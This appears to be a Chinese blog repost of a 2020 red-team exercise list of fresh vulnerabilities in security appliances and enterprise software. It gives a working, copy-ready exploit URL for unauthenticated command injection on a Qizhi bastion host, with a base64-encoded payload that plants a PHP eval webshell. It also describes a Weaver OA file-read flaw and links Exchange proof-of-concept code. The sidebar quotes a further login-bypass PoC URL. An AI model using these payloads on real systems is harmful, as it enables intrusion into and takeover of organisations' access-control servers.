HW第二天:0day快递盒在线送day

最新推荐文章于 2023-10-22 18:35:17 发布
最新推荐文章于 2023-10-22 18:35:17 发布
阅读量340 收藏
点赞数
分类专栏: 小课堂
原文链接:https://mp.weixin.qq.com/s/cLDM4ZvN1HKYQiVSuofEfA
版权

截止到2020年9月12日:0day清单

转自F11Team

齐治堡垒机前台远程命令执行漏洞

漏洞利用:

利用条件:无需登录:
第一

http://10.20.10.11/listener/cluster_manage.php 返回“OK”。
第二,执行以下链接即可 getshell,执行成功后,生成 PHP 一句话马

/var/www/shterm/resources/qrcode/lbj77.php 密码 10086,使用 BASE64 进行编码。这里假设 10.20.10.10 为堡垒机的 IP 地址。

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}-d|bash`|${IFS}|echo${IFS}

特征:
漏洞利用点:

https://10.20.10.10/ha_request.phpPoc 形式:${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}-d|bash`|${IFS}|echo${IFS}

泛微OA云桥任意文件读取漏洞

利用/wxjsapi/saveYZJFile接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。

多款Huawei产品越界读取漏洞

 

参考链接:https://www.cnvd.org.cn/flaw/show/CNVD-2020-36735

 

Exchange Server 远程代码执行漏洞(POC未验证)

CVE-2020-16875: Exchange Server 远程代码执行漏洞(202009月度漏洞)

ps 版POC:https://srcincite.io/pocs/cve-2020-16875.ps1.txt

py 版POC:https://srcincite.io/pocs/cve-2020-16875.py.txt

 

网传:山石SG-6000设备存在漏洞 

官方辟谣称 该公告并不是指设备本身存在漏洞,而是某个使用山石网科网络安全设备的管理员安全意识不足,配置不当导致,实属于事件型安全漏洞。

参考链接:https://mp.weixin.qq.com/s/lg2ttFSIybginh6KNS-SGQ

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

web安全工具库
关注
专栏目录
Day64_Kafka(二)
qq_36972345的博客
10-18 478
第二讲 Kafka架构 课程大纲 课程内容 学习效果 掌握目标 Kafka架构 Kafka就 掌握 Kafka ack Exactly once Kafka log Kafka log 掌握
李宏毅深度学习HW1 PM2.5预测(gradient descent)
null_zhao的博客
07-01 1717
李宏毅深度学习HW1 PM2.5预测 1.任务内容 根据前9个小时的空气监测情况预测第10个小时的PM2.5含量,即根据黄色部分内容预测红色处值。 训练集:包含台湾丰原地区240天的气象观测资料(取每个月前20天的数据做训练集,12月X20天=240天,每月后10天数据用于测试,对学生不可见),每天的监测时间点为整时共24个时间节点。每次的检测指标包括CO、NO、PM2.5、PM10,是...
齐治堡垒机任意用户登录漏洞
maverickpig的博客
01-23 4063
2021年进入网络安全行业,作为网络安全的小白,分享一些自学基础教程给大家。希望在自己能体系化的总结自己已有的知识的同时,能对各位博友有所帮助。文章内容比较基础,都是参考了很多大神的文章,各位不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力! 由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。 工作中遇到的漏洞,记录一下,本文仅作学习之用,请勿进行网络犯罪,遵守《网络安全法》等相关法律法规。 漏洞说明 浙江齐
齐治运维堡垒机后台命令执行漏洞
qq_44657899的博客
06-26 2106
文章目录漏洞描述漏洞影响漏洞复现 漏洞描述 H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞 漏洞影响 H3C SecParh堡垒机 漏洞复现 fofa语法: app="H3C-SecPath-运维审计系统" 先通过任意用户登录获取Cookie,/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(
齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
aijin3040的博客
07-17 3868
一、基本信息 参考:https://www.cnvd.org.cn/flaw/show/1559039 补丁信息:该漏洞的修复补丁已于2019年4月1日发布。如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。 二、漏洞挖掘过程 这是我第一次接触运维堡垒机,通过堡垒机登录目标服务器/应用,就像在本地直接打开一样,觉得很神奇。 1、挖掘过程 首先,在安装齐治运维堡...
H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞
Adminxe的博客
07-02 885
0x00 前言 H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令,漏洞类似于齐治堡垒机 0x01 影响范围 H3C SecParh堡垒机 0x02 漏洞复现 先通过任意用户登录获取Cookie /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(1..
山石防火墙镜像SG6000安装包
02-27
该资源为山石防火墙SG6000v的安装包,下载后可直接使用,初始账号为hillstone,密码为hillstone
week12_day2_hw
02-20
【描述】由于描述只给出了相同的"week12_day2_hw",没有提供具体的学习内容或作业详情,我们可以推测这可能是课程的一个持续学习过程,到了第十二周的第二天,学员们需要完成与之前学习内容相关的Java作业。...
信安学习-day14
ekko_jay的博客
11-07 262
传输层协议TCP、UDP,DHCP协议原理与配置
hw小技巧
weixin_43570648的博客
09-09 1743
小弟也第一次参加hw,经过5天hw,确实也学到了许多的东西,但就本次分享而言,我分享一些我认为在hw里面值得注意的东西以及一些小技巧 一.信息收集 信息收集这个多西当然都是老生常谈了,你收集的东西越多,能打的方向也就越多,当然,hw给你打的资源的格式一般为单位名称,系统名称,域名,IP地址。当然,其他的资源可能都大同小异。 网上都有很多信息收集的东西,都是那一套,扫端口,找子域名,看站有没有泄露什么东西,什么敏感文件,看网站的框架。现在,我就先给大家梳理一下。 信息收集的本质有2个,一是把现有的资源扩大,能
HW2020-0day总结1
08-03
2.天融信TopApp-LB sql注入 4.绿盟UTS绕过登录 5.WPS命令执行漏洞 6.齐治堡垒机 rce 7.联软准入漏洞 8.泛微云桥任意文件读取
学习笔记-常见安全设备渗透方法
人饭子的博客
10-30 1442
SecDevice - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 身份与访问控制 堡垒机 IMC 网络检测与响应 蜜罐 IDS 防火墙 WAF 网关 负载均衡 VPN 终端响应与检测 杀软 EDR 数据防泄漏系统 身份与访问控制 堡垒机 齐治堡垒机 Fofa: app...
齐治堡垒机某版本任意用户登录漏洞复现
ranuy阮的博客
05-20 3381
漏洞点 /audit/gui_detail_view.php poc /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm fofa app="齐治科技-堡垒机" 验证 URL https://xx.xx.xx.xx/audit/gui_detail_view.php?to
mysql堡垒机漏洞_关于近期网传齐治堡垒机漏洞的声明
weixin_39759589的博客
02-02 661
尊敬的用户:齐治科技(下述简称“齐治”)注意到近期有消息称“齐治堡垒机存在未修复的前台远程代码执行漏洞”。经过确认,消息提及的漏洞是齐治已停售产品Shterm的已修复漏洞,请仍在使用Shterm堡垒机的用户及时升级至最新版本。详细情况如下。//消息来源一网上流传一张涉及齐治堡垒机的图片(其他厂家信息已做模糊处理)。可以看到该信息非常简单,所述漏洞缺少细节,并且把“齐治”写成“奇治”,可采信度很低...
红队中的一些重点系统漏洞整理(通用的一些漏洞)
qq_50854662的博客
02-20 817
红队中的一些重点系统漏洞整理(通用的一些漏洞)
H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞
最新发布
自强不息,厚德载物
10-22 572
道虽远,行则易至;儒虽难,坚为易成
齐治堡垒机_任意用户登录漏洞
MD@@nr丫卡uer
04-12 1918
fofa查询语法 app=“齐治科技-堡垒机” 漏洞复现 漏洞POC为 http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
2020HW期间0day快报集合[ 每日更新 ]
z1feiyu
09-15 1782
目录 0x01 天融信TopApp-LB 负载均衡系统sql注入 0x02 用友GRP-u8 注入 0x03 绿盟UTS综合威胁探针管理员任意登录 0x04 齐治堡垒机前台远程命令执行漏洞(无需登录) 0x05 泛微OA云桥任意文件读取漏洞 0x06 Exchange Server 远程代码执行漏洞(POC未验证) 0x07 联软科技产品【准入】存在任意文件上传和命令执行漏洞 0x08 通达0A v11.7 后台SQL注入导致RCE 0x09 天融信数据防泄漏系统越权修改管理员密码 目前
mysql堡垒机漏洞_齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
weixin_39992483的博客
02-02 640
一、基本信息参考:https://www.cnvd.org.cn/flaw/show/1559039补丁信息:该漏洞的修复补丁已于2019年4月1日发布。如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。二、漏洞挖掘过程这是我第一次接触运维堡垒机,通过堡垒机登录目标服务器/应用,就像在本地直接打开一样,觉得很神奇。1、挖掘过程首先,在安装齐治运维堡垒机客户端软件ShtermClie...
2022年HW漏洞利用库:实战导向,非0day风险警示
"2022年HW前沿漏洞利用库是一份专门针对IT安全领域的专业文档,它关注的是在2022年可能出现的已知漏洞,而非0-day(零日漏洞)利用。这份文档旨在提高网络安全意识,提供给防御者和安全团队参考,而非用于未经授权的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值